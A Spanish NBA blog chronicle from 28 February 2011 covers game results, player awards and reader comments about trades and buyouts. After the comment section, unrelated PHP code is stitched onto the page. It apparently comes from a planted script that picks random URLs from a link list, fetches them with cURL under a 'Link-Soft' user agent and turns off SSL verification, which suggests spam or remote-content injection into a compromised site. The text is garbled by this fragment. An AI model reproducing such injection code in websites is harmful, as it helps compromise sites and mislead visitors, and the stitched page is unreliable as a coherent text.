La Crónica (28/02/2011)

01 de March de 2011 por TheDeerHunter

Hemos sufrido un Dejà Vú. La sensación de haber vivido anteriormente que los Suns alcanzan agónicamente la prórroga y se llevan finalmente el gato al agua con un triplazo de Frye. Tan dejà vú como que os lo habíamos contado ya en la crónica anterior pero con diferentes rivales y sutiles variaciones. La víctima en esta ocasión fueron los Nets, donde Anthony Morrow ha resucitado con la llegada de un Deron Williams que se está inflando a repartir juego. En las sutiles variaciones, en cambio, no entra que Vince Carter deje de estar más perdido en los Suns que Marco el día de la madre. Esta vez le acompañó Grant Hill en la inopia tras el inmenso partido de ayer. Lo verdaderamente notable (qué gran frase) es que los astros se confabularon para que simultáneamente Robin Lopez y Hakeem Warrick firmaran una gran actuación. Además estuvieron bien arropados por la excelente segunda unidad que maneja Gentry. Cada día están más cerca de postemporada (104-103)

A otro que le va muy bien tras ese trade es a Al Jefferson. Además ayer se enfrentaba al equipo que le introdujo en la NBA y además, los Celtics están muy blanditos por dentro. Lo pasaron mal los verdes en su visita a Salt Lake City. Fue una de esas noches “infalibles” del viejo Ray lo que les desatascó la faena, pero la merma defensiva es palpable… de momento (107-102).

Importante victoria de los Nuggets ante los Hawks (90-100). Gallinari y Hinrich no fueron de la partida por lesión y se nota más la ausencia del segundo en un equipo con carencias en la construcción. Mientras, Bibby ha firmado su salida de Washington y se habla de los Heat. Los Wizards lo celebraron sufriendo un palizón de muy señor mío ante unos Bulls que, con Noah cogiendo la forma, meten miedo (105-77).

Finalmente los Clippers sucumbieron contra los Kings a pesar del de siempre (99-105). Partidazo inmenso de Marcus Thornton. Ya teníamos ganas de verle cuajar uno de estos.

PREMIOS

MVP: Y sorpresa al mismo tiempo. Los 16 puntos de Marcus Thorton anotados en el último cuarto fueron claves en la victoria a los Kings sobre los Clippers. En total, el ex jugador de los Hornets se fue a los 29 puntos.

Rookie: Blake Griffin se volvió a salir anoche superando a John Wall por los 4 costados. 27 puntos, 12 rebotes y 4 asistencias, nada menos.

Sorpresa: La salida de Derrick Favors ha vuelto a otorgar a Kris Humphries la titularidad en los Nets y él responde con lo que mejor sabe hacer, rebotear. Anoche fueron 15 rebotes coronados con 16 puntos y un casi-buzzer-beater.

Decepción: Si alguien esperaba que al lado de Nash Vince Carter mejoraría sustancialmente no podía estar más equivocado. El canadiense tampoco es mago y habría que serlo para que Carter mejorara su actual nivel. Anoche fueron sólo 5 puntos (2 de 12) en 29 minutos.

Esfuerzo en vano: Día curioso el de hoy. Las 4 mejores actuaciones individuales se han quedado sin premio. Los 28 puntos y 10 rebotes de Brook Lopez, el 27-12-4 de Blake Griffin, el 21-16-4 de Al Horford y, sobretodo, el 28-19 de Al Jefferson.

Imágenes | AP Photos / Getty Images

Comenta

14 comentarios a esta entrada

  1. CAMPO2 dice:
    #1

    Prokorov tiene temporada y media para convencer a D-Will para que se quede.

      Citar

  2. Txusma dice:
    #2

    No están mal salarialmente pero estarían mucho mejor si no hubieran firmado los contratos de Outlaw, Petro o Farmar, por ejemplo.

    Cambiando de tema, como Bibby y Murphy fichen por los Heat, ojito.

      Citar

  3. GreenPride dice:
    #3

    Partido bueno en ataque del Big 3 de los Celtics, cada uno tirando del carro en algún momento del partido, Ray al principio y al final, Pierce en el segundo cuarto, KG en el tercero. De momento Krstic mejora a Perkins en ataque aunque en defensa Al Jefferson les hizo un traje hasta que Garnett paso a defenderlo al final del partido. Green es el que de momento no coge el ritmo verde y sobre todo se le ve sufrir defendiendo en la posición de 3. Veremos que pasa cuando vayan cogiendo los sistemas, vuelvan los O’Neal y quién llega en el mercado de buyouts. Por los Jazz Devin Harris se marcó varios coast to coast pero ya sabemos que reparte mucho menos juego que Deron. Partidazo de Jefferson poniendo en entredicho la defensa interior verde. Los Jazz sin su entrenador ni su base empiezan a tener difícil entrar en playoffs ante equipos en mucha mejor forma como los Grizzlies o los Suns

      Citar

  4. CAMPO2 dice:
    #4

    Yo en cuanto a dinero no me preocupo sino en cuanto a rodearlo de buenos jugadores, si que creo que habria que cambiar a Outlaw y algo mas por un buen exterior que aporte 20 puntitos todos los dias Terrence Williams podria haber sido ese jugador pero entre que de la cabeza no andaba muy fino y no se llevaba bien con Avery johnson se lo crujieron, y algun recambio de garantias en el juego interior no estaría nada mal

      Citar

  5. TheDeerHunter dice:
    #5

    ¿Quién se lleva bien con Avery Johnson??
    Si yo sólo con oirlo hablar por TV me pongo de los jodidos nervios…

      Citar

  6. CAMPO2 dice:
    #6

    Si que va un poco de perdona vidas, aprte del maestro Sloan, hay algun entrenador capaz de guiar un equipo como los Nets para lo que quiere Prokorov que dijo que en 5 años tendria un anillo?

      Citar

  7. TheDeerHunter dice:
    #7

    Su psiquiatra podría arreglarlo… con una camisa de fuerza. (y medicación potente)

      Citar

  8. Scriers dice:
    #8

    Ayer vi el partidazo de los Suns contra los Nets, quién lo iba a decir. Hubieron jugadas destacables, dos o tres jugadas buenas Vujacic asistiendo. Un megatapón de Humpries a López, una racha de Pietrus que le entraba todo y una buena distribución de Williams, que se va a hundir anímicamente en estos Nets. Pero sin duda me quedo con una asistencia que da Nash inverosimil, cuando ya se queda sin salto, gira el cuerpo y cambia de mano y hace un mate Pietrus o Frye, no recuerdo. Pero la jugada es brutal. Qué máquina ese tío.

      Citar

  9. sergio dice:
    #9

    Creo que hace una bandeja Scriers… y juraría que es Robin Lopez

      Citar

  10. max dice:
    #10

    Según ESPN Troy Murphy acaba de fichar por los Celtics, después de ser cortado por Golden State. Grandisimo refuerzo para los verdes.

      Citar

  11. Denise dice:
    #11

    Entonces ya se entiende lo de Perkins.
    Malditos Buyouts!! , no deberían existir !!. Odio los buyouts, sobre todo cuando perjudican a tu equipo.

      Citar

  12. KB # 24 dice:
    #12

    Aquí se ve cómo los ejecutivos de los celtics han logrado tener al equipo arriba los últimos años!

    Mandas a Perkins a OKC y recibes a Green y Murphy. no está mal, y aún más pensando en que Perkins es un expiring y pediría el oro y el moro.

      Citar

  13. luigi_sal dice:
    #13

    denise, creo que tú eras de los magic. q bien nos hubiera venido murphy para tener cuatro tíos “hábiles” por dentro. a ver si earl clark aprovecha esta oportunidad, yo creo q tiene físico y calidad para ello. pero van gundy debe darse cuenta de q es mejor jugar con 10 jugadores y dar más minutos a quentin -a mí turkoglu no me convence, pese a sus asistencias-. ni defiende ni tira bien

      Citar

  14. Denise dice:
    #14

    Murphy nos hubiera venido bien, pero lo más importante para mí, es recuperar a Arenas, que está dando un rendimiento patético. Turkoglu, ya conocemos, lo irregular que es, capaz de lo mejor y de lo peor, pero es que Arenas solo ha dado su versión mala.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>